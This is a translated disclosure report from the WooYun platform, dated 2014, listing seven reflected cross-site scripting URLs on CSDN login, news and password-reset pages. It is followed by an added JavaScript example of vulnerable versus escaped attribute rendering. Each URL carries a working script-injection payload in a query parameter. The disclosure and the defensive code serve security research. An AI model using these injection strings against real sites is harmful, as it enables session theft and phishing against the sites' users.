Vulnerability summary

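Bug ID: wooyun-2014-074360

Title: Multiple reflected XSS issues on CSDN

Vendor: CSDN Developer Community

Author: 路人甲

Submitted: 2014-08-29 17:31

Fixed: 2014-09-03 17:32

Disclosed: 2014-09-03 17:32

Vulnerability type: XSS (cross-site scripting)

Severity: Low

Self-assessed rank: 1

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org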


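Vulnerability details

Disclosure status:

2014-08-29: Details reported to the vendor; awaiting vendor handling
2014-09-03: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Multiple reflected XSS issues on CSDN

Detailed description: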

Location 1: http://passport.csdn.net/account/login?from=http%3a%2f%2fhero.csdn.net%2fOnlineCompiler%2fIndex%3fID%3d633%26ExamID%3d628%26from%3d4%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
Location 2: http://news.csdn.net/article_preview.html?preview=1&reload=1&arcid=2821118%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
Location 3: http://passport.csdn.net/account/login?from=http%3A%2F%2Fdownload.csdn.net%2Fmy%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
Location 4: https://passport.csdn.net/account/fpwd?action=forgotpassword&service=http://www.csdn.net/%20service=http://www.csdn.net/%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
Location 5: http://special.csdn.net/bdclive/index.html/2?regionid=1455%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
Location 6: http://passport.csdn.net/account/fpwd?action=forgotpassword&from=http%3A%2F%2Fjob.csdn.net%2Fcsdn%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
Location 7: http://passport.csdn.net/account/login?from=http%3A%2F%2Fnews.csdn.net%2Farticle%2F2014-08-27%2F2821403-the-top-9-of-ali-bigdata-competition%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

Proof of concept:

The same seven URLs as listed under the detailed description.

Suggested fix:

Filter them, take your time (*^__^*)

Copyright notice: when reposting, please credit the source 路人甲@乌云
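Added example, not part of the original report and not CSDN's code: the reported `from` value rendered with plain concatenation, next to a version that validates the return URL and encodes it for the output context. It assumes the parameter is reflected into a double-quoted HTML attribute (inferred from the `">` prefix of the payloads; the report does not show the response markup); the function names, the markup, the host allowlist and the fallback URL are hypothetical.

```javascript
// Added example; function names, markup and the host allowlist are assumptions.
// Query string of the first URL in the report (login page, `from` parameter).
const REPORTED_QUERY =
  "from=http%3a%2f%2fhero.csdn.net%2fOnlineCompiler%2fIndex%3fID%3d633%26ExamID%3d628" +
  "%26from%3d4%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E";

// Vulnerable pattern: decoded parameter concatenated into a quoted attribute.
function renderVulnerable(query) {
  const from = new URLSearchParams(query).get("from") || "";
  return '<input type="hidden" name="from" value="' + from + '">';
}

// Encode every character that can end an attribute value or start a tag.
function escapeHtmlAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Accept only http(s) return URLs on the site's own domain; otherwise fall back.
function safeReturnUrl(raw, fallback = "http://www.csdn.net/") {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return fallback; // not an absolute URL
  }
  const host = url.hostname;
  const onSite = host === "csdn.net" || host.endsWith(".csdn.net");
  if (!["http:", "https:"].includes(url.protocol) || !onSite) return fallback;
  return url.href; // the parser's serialization percent-encodes " < > in path/query
}

// Hardened pattern: validate the value, then encode for the output context.
function renderHardened(query) {
  const from = new URLSearchParams(query).get("from") || "";
  return '<input type="hidden" name="from" value="' + escapeHtmlAttr(safeReturnUrl(from)) + '">';
}

console.log(renderVulnerable(REPORTED_QUERY));
console.log(renderHardened(REPORTED_QUERY));
```

Encoding at the point of output is what closes the hole; the URL validation additionally keeps the return target on the site's own hosts.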


Vulnerability response

Vendor response:

Severity: No impact, ignored by the vendor

Ignored at: 2014-09-03 17:32

Vendor reply:

Latest status:

None yet